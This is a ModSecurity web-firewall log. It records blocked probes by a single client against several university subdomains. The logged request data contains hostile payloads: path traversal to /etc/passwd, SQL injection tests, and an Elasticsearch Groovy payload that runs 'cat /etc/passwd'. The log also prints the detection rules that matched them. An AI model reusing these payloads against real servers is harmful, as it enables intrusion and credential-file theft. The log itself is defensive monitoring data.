[Tue Aug 29 11:47:50.415853 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAhl0McAAAAi"]
[Tue Aug 29 11:47:50.418618 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjrbKcAAAAP"]
[Tue Aug 29 11:47:50.423835 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAjtc4sAAAAX"]
[Tue Aug 29 11:47:50.424306 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkNPosAAAAI"]
[Tue Aug 29 11:47:50.439959 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkAL9EAAAAU"]
[Tue Aug 29 11:47:50.440808 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAjqDFMAAAAH"]
[Tue Aug 29 11:47:50.443340 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkNPowAAAAI"]
[Tue Aug 29 11:47:50.443640 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjtc4wAAAAX"]
[Tue Aug 29 11:47:50.456733 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkaC@8AAAAJ"]
[Tue Aug 29 11:47:51.389567 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAkAL9IAAAAU"]
[Tue Aug 29 11:47:51.393157 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14d8Co-f0AAAkdu4EAAAAO"]
[Tue Aug 29 11:47:51.415384 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "ft.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkBKo8AAAAb"]
[Tue Aug 29 11:47:51.437136 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14d8Co-f0AAAkNPo4AAAAI"]
[Tue Aug 29 11:47:51.442739 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAjdQQYAAAAZ"]
[Tue Aug 29 11:47:51.442884 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "journal.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAhT4DUAAAAD"]
[Tue Aug 29 11:47:51.457048 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "informatika.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkBKpEAAAAb"]
[Tue Aug 29 11:47:51.457477 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14d8Co-f0AAAkAL9UAAAAU"]
[Tue Aug 29 11:47:51.459759 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAkNPo8AAAAI"]
[Tue Aug 29 11:47:51.461715 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAj11@UAAAAa"]
[Tue Aug 29 11:47:51.463369 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAhT4DYAAAAD"]
[Tue Aug 29 11:47:51.463732 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjdQQcAAAAZ"]
[Tue Aug 29 11:47:52.431778 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "pusatbahasa.unla.ac.id"] [uri "/_search"] [unique_id "ZO14eMCo-f0AAAhT4DcAAAAD"]
[Tue Aug 29 11:47:52.467343 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjy51oAAAAG"]
[Tue Aug 29 11:47:52.467718 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjdQQgAAAAZ"]
[Tue Aug 29 11:47:52.469412 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjbw3YAAAAW"]
[Tue Aug 29 11:47:52.524602 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjqDFoAAAAH"]
[Tue Aug 29 11:47:52.564837 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAhT4DkAAAAD"]
[Tue Aug 29 11:47:52.583050 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjy51wAAAAG"]
[Tue Aug 29 11:47:52.583498 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAkAL9gAAAAU"]
[Tue Aug 29 11:47:52.594998 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjtc5UAAAAX"]
[Tue Aug 29 11:47:52.609286 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjdQQoAAAAZ"]
